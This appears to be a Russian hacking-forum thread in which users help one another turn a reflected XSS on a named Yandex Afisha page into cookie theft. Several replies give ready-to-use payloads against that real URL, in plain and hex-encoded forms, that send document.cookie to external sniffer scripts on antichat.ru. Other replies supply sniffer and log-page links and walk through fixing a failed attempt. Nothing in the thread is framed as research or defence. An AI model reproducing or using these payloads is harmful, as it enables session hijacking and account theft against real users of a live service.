Xss на яндексе... Требуеца помощь

PHP:

http://afisha.yandex.ru/reviews.xml?event_id=14913381&city=%22%3E%3Cscript%3Ealert()%3C/script%3E

Вот наша хсска... Нам нада составить ее так чтобы логи шли на сниффер... Народ, кому не лень составьте пожалуйста четкую ссылку на сниффер античата... Долблюсь ап стену уже 3 час и нифига не пойму где у меня ошибка.... Если распишите все поэтапно буду очень благодарен... В любом случае с меня + к репе!


Извиняюсь за тупые вопросы в ХSS еще плохо разбираюсь поэтому йад и стены прошу не прописывать

 

http://forum.antichat.ru/thread19610.html

 

Просмотрел почти все темы... В принципе уяснил что к чему, но опять же в теории все слишком аморфно.. На рпактике все гораздо сложнее... Всеже попрошу составить скрипт по крайней мере для наглядности...

 

ЗА чем тебе писать или искать скрипт, просто на форуме есть тема где их выкладывают!

 

да я имею ввиду применение скрипта. ну допустим мне нада составить его так чтобы он таскал куки на мой снифер на античате. приведите мне пример на этой xss.

 

вобщем даже вот в чем суть вопроса- помогите составить корректный запрос чтобы с этого адреса куки уходили на сниффер...

 

На, лови:

Code:

http://afisha.yandex.ru/reviews.xml?event_id=14913381&city=%22%3E%3Cscript src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;></script%3E

Плюс не забудь

 

Можешь соорудить что нибудь этакое
<script>document.location="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie</script>

 

вот соорудил я конструкцию такого вида

http://afisha.yandex.ru/reviews.xml?event_id=14913381&city=%22%3E%3Cscript%20src=%22http://antichat.ru/s/мойсниф.jpg?%22+document.cookie;%3E%3C/script%3E

но отчеты не приходят.. видно гдето абшибся

 

Тык неправельно ты адрес задал, надо не ../s/yoursniff.jpg а .../cgi-bin/yoursnif.jpg

 

аха.. вижу.. значит правим http://antichat.ru/s/мойсниф.jpg на http://antichat.ru/cgi-bin/мойсниф.jpg и все должно пойти?

 

_http://antichat.ru/cgi-bin/s.jpg
Вот это поставь и всё.

 

хм всеравно кукы на античатовский сниффер не лезут.... Ничего не понимаю.... чеж за фигнято.. =((

 

СмоРи и Юзай...

Code:

http://afisha.yandex.ru/reviews.xml?event_id=14913381&city=%22%3E%3C%73%63%72%69%70%74%3E%69%6D%67%20%3D%20%6E%65%77%20%49%6D%61%67%65%28%29%3B%20%69%6D%67%2E%73%72%63%20%3D%20%22%68%74%74%70%3A%2F%2F%61%6E%74%69%63%68%61%74%2E%72%75%2F%63%67%69%2D%62%69%6E%2F%73%2E%6A%70%67%3F%22%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B%3C%2F%73%63%72%69%70%74%3E

ВообЩем кто не понял... заходим к примеру на http://ha.ckers.org/xss.html
там в самон низу есть
Character Encoding Calculator
ASCII Text:
значит сюда вбиваем "><script>img = new Image(); img.src = "http://site/ваш_сниф.gif?"+document.cookie;</script>
и жМЁм Encode и получаем в строке Hex Value: наШу хренотень..и вставляем куда надо..

аВось кто ПлюсиК поставит...

 

На вот проверь этот сниф!
ССылка на него:
http://antichat.ru/s/lol.gif

А логи посмотришь здесь!
http://antichat.ru/s/lol/log.php?

Я проверял !работает!
Но пользуйся аккуратно он чужой! ))

 

Все ок.. Видимо чтото я при создании сниффера накосячил... Всем кто помогал + к репе... Спасибо парни

 

Или так:
http://afisha.yandex.ru/reviews.xml?event_id=14913381&city="><script>img=new%20Image();img.src="http://antichat.ru/cgi-bin/s.jpg?"%2Bdocument.cookie</script>

Лог смотри тут:
http://antichat.ru/sniff/log.php
---
Там плюс вырезался.